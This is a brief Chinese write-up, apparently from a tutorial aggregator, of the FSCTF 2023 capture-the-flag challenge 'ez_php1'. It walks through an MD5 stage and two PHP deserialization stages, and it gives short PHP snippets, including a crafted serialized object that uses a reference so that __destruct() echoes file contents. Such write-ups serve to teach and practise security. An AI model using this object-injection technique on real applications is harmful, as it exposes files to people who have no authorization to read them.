本文主要是介绍[FSCTF 2023]ez_php1,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
一共有三小关
第一关:md5加密
第二关:反序列化
重点 单个字符串序列化 unserialize($str) === "$KEY"
<?php
$KEY="YES I love";echo serialize($KEY);
s:10:"YES I love";
第三关: 反序列化
把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。
$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);
这篇关于[FSCTF 2023]ez_php1的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!